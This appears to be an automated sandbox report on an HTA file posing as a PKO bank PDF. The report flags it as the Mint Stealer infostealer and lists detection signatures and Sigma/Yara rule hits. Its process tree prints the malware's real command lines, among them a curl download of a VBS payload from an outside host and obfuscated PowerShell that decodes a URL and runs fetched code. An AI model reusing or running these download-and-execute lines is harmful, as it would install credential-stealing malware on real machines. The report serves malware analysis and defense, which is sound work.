Windows
Analysis Report
PKO_0019289289544_PDF_#U2463#U2466#U2465#U2462#U2461#U2466#U2464#U2462.hta
Overview
General Information
Field | Value |
---|---|
Sample name | PKO_0019289289544_PDF_#U2463#U2466#U2465#U2462#U2461#U2466#U2464#U2462.hta (renamed because original name is a hash value) |
Original sample name | PKO_0019289289544_PDF_.hta |
Analysis ID | 1578780 |
MD5 | 80acb2df20b8aa675a02058a2a5a7cbb |
SHA1 | ab0fb4d7568de09e774b0a47c08d156084f642c4 |
SHA256 | bf2df69719d5cebbeca305ca64b8327b26c5b0312a516467b80034c3735dbd25 |
Tags | hta, user-cdcd |
Detection
Mint Stealer
Field | Value |
---|---|
Score | 100 |
Range | 0 - 100 |
Whitelisted | false |
Confidence | 100% |
Signatures
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Mint Stealer
AI detected suspicious sample
Creates processes via WMI
Obfuscated command line found
Sigma detected: Legitimate Application Dropped Script
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Script Initiated Connection
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- mshta.exe (PID: 6700 cmdline: mshta.exe "C:\Users\user\Desktop\PKO_0019289289544_PDF_#U2463#U2466#U2465#U2462#U2461#U2466#U2464#U2462.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
- cmd.exe (PID: 2136 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\676556be12aca.vbs https://file-download.bytez.cloud/676556be12355/676556be12aca.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 1904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- curl.exe (PID: 6964 cmdline: curl -k -o C:\Users\Public\676556be12aca.vbs https://file-download.bytez.cloud/676556be12355/676556be12aca.vbs MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
- cmd.exe (PID: 2836 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\676556be12aca.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 3384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 6960 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\676556be12aca.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
- wscript.exe (PID: 4248 cmdline: "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\cagesr.js MD5: FF00E0480075B095948000BDC66E81F0)
- cmd.exe (PID: 2044 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\676556be12aca.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 5016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 4296 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\676556be12aca.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
- wscript.exe (PID: 6484 cmdline: "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\djtukm.js MD5: FF00E0480075B095948000BDC66E81F0)
- conhost.exe (PID: 3052 cmdline: conhost --headless powershell $tfqdysmblvrcw='ur' ;new-alias printout c$($tfqdysmblvrcw)l;$eipxqtmaufl=(3052,3063,3071,3055,3057,3052,3072,3071,3076,3009,3071,3005,3052,3000,3070,3065,3066,3001,3003,3000,3066,3058,3066,3017,3069,3015,3063,3059,3064,3070,3069,3004,3003);$ojxutsrkdwlmfg=('bronx','get-cmdlet');$beuwadknj=$eipxqtmaufl;foreach($juaveihgnosc in $beuwadknj){$edlkzoftxn=$juaveihgnosc;$sojqxwd=$sojqxwd+[char]($edlkzoftxn-2954);$cqgevos=$sojqxwd; $hmaoevupsdbn=$cqgevos};$knztexjygdmwfo[2]=$hmaoevupsdbn;$lkrpqc='rl';$ypatcirzmquds=1;.$([char](9992-9887)+'e'+'x')(printout -useb $hmaoevupsdbn) MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7172 cmdline: powershell $tfqdysmblvrcw='ur' ;new-alias printout c$($tfqdysmblvrcw)l;$eipxqtmaufl=(3052,3063,3071,3055,3057,3052,3072,3071,3076,3009,3071,3005,3052,3000,3070,3065,3066,3001,3003,3000,3066,3058,3066,3017,3069,3015,3063,3059,3064,3070,3069,3004,3003);$ojxutsrkdwlmfg=('bronx','get-cmdlet');$beuwadknj=$eipxqtmaufl;foreach($juaveihgnosc in $beuwadknj){$edlkzoftxn=$juaveihgnosc;$sojqxwd=$sojqxwd+[char]($edlkzoftxn-2954);$cqgevos=$sojqxwd; $hmaoevupsdbn=$cqgevos};$knztexjygdmwfo[2]=$hmaoevupsdbn;$lkrpqc='rl';$ypatcirzmquds=1;.$([char](9992-9887)+'e'+'x')(printout -useb $hmaoevupsdbn) MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 7212 cmdline: conhost --headless powershell $wcahze='ur' ;new-alias printout c$($wcahze)l;$trsoqwlp=(1811,1822,1830,1814,1816,1811,1831,1830,1835,1768,1830,1764,1811,1759,1829,1824,1825,1760,1762,1759,1825,1817,1825,1776,1828,1774,1822,1818,1823,1829,1828,1763,1762);$xepbrqkoau=('bronx','get-cmdlet');$dehltizxfcswu=$trsoqwlp;foreach($fahyrwncbvdkjm in $dehltizxfcswu){$dgznhjbpvsl=$fahyrwncbvdkjm;$pkhdavnfqjgs=$pkhdavnfqjgs+[char]($dgznhjbpvsl-1713);$swoezd=$pkhdavnfqjgs; $zotfqbascrdlje=$swoezd};$jmlkbouispxcrh[2]=$zotfqbascrdlje;$kuweximjag='rl';$obgwvcmaft=1;.$([char](9992-9887)+'e'+'x')(printout -useb $zotfqbascrdlje) MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7232 cmdline: powershell $wcahze='ur' ;new-alias printout c$($wcahze)l;$trsoqwlp=(1811,1822,1830,1814,1816,1811,1831,1830,1835,1768,1830,1764,1811,1759,1829,1824,1825,1760,1762,1759,1825,1817,1825,1776,1828,1774,1822,1818,1823,1829,1828,1763,1762);$xepbrqkoau=('bronx','get-cmdlet');$dehltizxfcswu=$trsoqwlp;foreach($fahyrwncbvdkjm in $dehltizxfcswu){$dgznhjbpvsl=$fahyrwncbvdkjm;$pkhdavnfqjgs=$pkhdavnfqjgs+[char]($dgznhjbpvsl-1713);$swoezd=$pkhdavnfqjgs; $zotfqbascrdlje=$swoezd};$jmlkbouispxcrh[2]=$zotfqbascrdlje;$kuweximjag='rl';$obgwvcmaft=1;.$([char](9992-9887)+'e'+'x')(printout -useb $zotfqbascrdlje) MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| | JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security | |
| | JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security | |
| | JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security | |
System Summary

Source | Author |
---|---|
| | frack113, Florian Roth (Nextron Systems) |
| | frack113, Florian Roth |
| | Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) |
| | Michael Haag |
| | Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton |
| | Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community |
| | Tim Shelton |
| | frack113 |
| | James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger |
| | Michael Haag |
| | Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) |